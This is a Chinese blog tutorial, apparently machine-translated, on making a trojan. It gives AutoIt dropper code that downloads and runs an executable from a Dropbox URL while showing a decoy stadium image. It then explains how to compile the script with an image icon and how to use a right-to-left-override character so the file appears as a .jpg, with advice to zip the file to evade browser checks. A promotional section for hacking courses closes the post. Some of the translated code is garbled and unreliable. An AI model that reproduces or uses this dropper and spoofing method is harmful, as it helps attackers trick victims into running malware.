文章目录
- 前言
-
- 什么是木马恶意软件?
- 创建我的木马恶意软件
-
- 1. 获取图像和`.exe`文件的直接 URL
- 2. 在脚本中使用 URL
- 3. 为文件创建图标
- 4. 编译脚本
- 5. 欺骗“.exe”扩展名到任何扩展名
- 1️⃣网络安全/黑客零基础入门
-
- ① 学习路线
- ② 路线对应学习视频
- 2️⃣视频配套资料&国内外网安书籍、文档
-
- ① 文档和书籍资料
- ② 网络安全/黑客学习视频
- 3️⃣网络安全源码合集+工具包
- 4️⃣网络安全面试题
- 资料领取
前言
特洛伊木马(或特洛伊木马)是可能感染您的计算机或移动设备的最常见和最危险的威胁类型之一。
什么是木马恶意软件?
木马恶意软件,打开时似乎是用户打开的合法文件,例如打开图像或文档或播放媒体文件,但在后台,它会运行一些邪恶的进程,例如有人可能通过后门或注入一些其他有害代码。
创建我的木马恶意软件
在这篇博客中,我将向您展示如何将我的可执行文件与图像文件结合起来,并且在打开时,它能够在目标人打开它时显示图像,但同时可执行文件在后台运行。简而言之,我将.exe
文件隐藏在.jpg
图像文件中。
此方法可以扩展到任何文件类型,如图像、pdf、音乐等。大多数情况下,可执行文件是病毒或用于访问目标计算机的后门。我们来看看步骤:
1. 获取图像和.exe
文件的直接 URL
可执行文件.exe
需要出现在公开可用的 URL 上,浏览器可以从该 URL 直接下载该可执行文件。为此,我已将可执行文件上传到 Dropbox 上。对于 dropbox,将可共享链接的末尾部分修改为dl=1
将允许浏览器直接下载文件。我在下面共享的链接不包含任何代码,实际上是一个空文件,因此您可以安全地测试此链接的行为。
可执行文件的 URL .exe
:https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe ?dl=1
图片的网址:
体育场馆形象
我使用了体育场馆的图像作为封面。
2. 在脚本中使用 URL
#include <StaticConstants.au3>
#include <WindowsConstants.au3>本地 $urls = "url1,url2"本地 $urlsArray = StringSplit($urls, ",", 2 )对于 $url 在 $urlsArray
$sFile = \_DownloadFile($url)
shellExecute($sFile)下一个Func \_DownloadFile($sURL)
本地 $hDownload, $sFile
$sFile = StringRegExpReplace($sURL, "^.\*/", "")
$sDirectory = @TempDir & $sFile
$hDownload = InetGet($sURL, $sDirectory, 17 , 1)
InetClose($hDownload)
返回 $sDirectory
EndFunc ;==>\_GetURLImage
在上面代码的第 3 行中,替换url1
为图像的 URL 和url2
可执行文件的 URL。我的最终代码如下所示
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
本地 $urls = " https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park\_garden\_concourse.jpg ,https://www.dropbox.com/s/hsnvw0ik1em0637/some\_evil\_file.exe?dl=1 "
本地 $urlsArray = StringSplit($urls, ",", 2 )
对于 $url 在 $urlsArray
$sFile = \_DownloadFile($ url)
shellExecute($sFile)
Next
Func \_DownloadFile($sURL)
本地 $hDownload, $sFile
$sFile = StringRegExpReplace($sURL, "^.\*/", "")
$sDirectory = @TempDir & $sFile
$hDownload = InetGet ($sURL, $sDirectory, 17, 1)
InetClose($hDownload)
返回 $sDirectory
EndFunc ;==>\_GetURLImage
使用扩展名保存文件.au3
。我已将该文件命名为trojan.au3
.
3. 为文件创建图标
由于我使用图像作为封面文件,Windows
通常将图像的缩略图显示为文件图标,因此我将使用体育综合体图像作为图标并将其转换为.ico
格式。你可以用谷歌搜索它,你会发现很多工具可以做到这一点。我使用这个网站 - https://cloudconvert.com/jpg-to-ico
4. 编译脚本
该脚本是用一种称为 的脚本语言编写的AutoIt
。AutoIt
要在 Ubuntu 中安装,您可以安装wine
并安装AutoIt
,或者如果您想要一种简单的方法,请Veil
按照此处提到的步骤进行安装https://www.javatpoint.com/installing-veil。AutoIt
将在其中一个步骤中进行安装,然后您可以退出安装。
打开编译 AutoIt 应用程序。该窗口应类似于下图所示的框。输入文件的位置trojan.au3
和文件的路径.ico
。
转换后的文件在 Windows 机器上看起来像这样。
嗯,有些不对劲。该文件的问题在于其扩展名。很明显它是一个可执行文件,因为它的扩展名是.exe
. 我们需要欺骗这个扩展。
5. 欺骗“.exe”扩展名到任何扩展名
为了欺骗明显的扩展名.exe
并将其替换为.jpeg
,我们将使用一个right-to-left-override
字符。
要了解欺骗实际工作原理以及角色放置位置的详细信息right-to-left-override
,请阅读博客。
欺骗文件扩展名——道德黑客
文件扩展名欺骗是创建木马时的一个方便技巧。我将把“.exe”扩展名欺骗为“.jpg”……
levelup.gitconnected.com
总结一下上面博客中提到的步骤:
-
重命名
trojan.exe
为trojangpj.exe
. -
将字符粘贴
right-to-left-override
到trojan后面的第7个位置。该字符之后的所有字符right-to-left-override
将被翻转,即从右向左读取。
文件名现在看起来像trojanexe.jpg
由于文件中包含的图像是一个体育中心的图像,因此我将trojan
名称替换为sportscompl_
,以便文件名显示为sports_complexe.jpg
.
恭喜!!!木马已准备就绪。
现在文件名与包含的图像匹配。一些最新的浏览器在下载之前删除了从右到左的覆盖。因此,最好将文件压缩并发送出去。
题外话
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
侵权,请联系删除。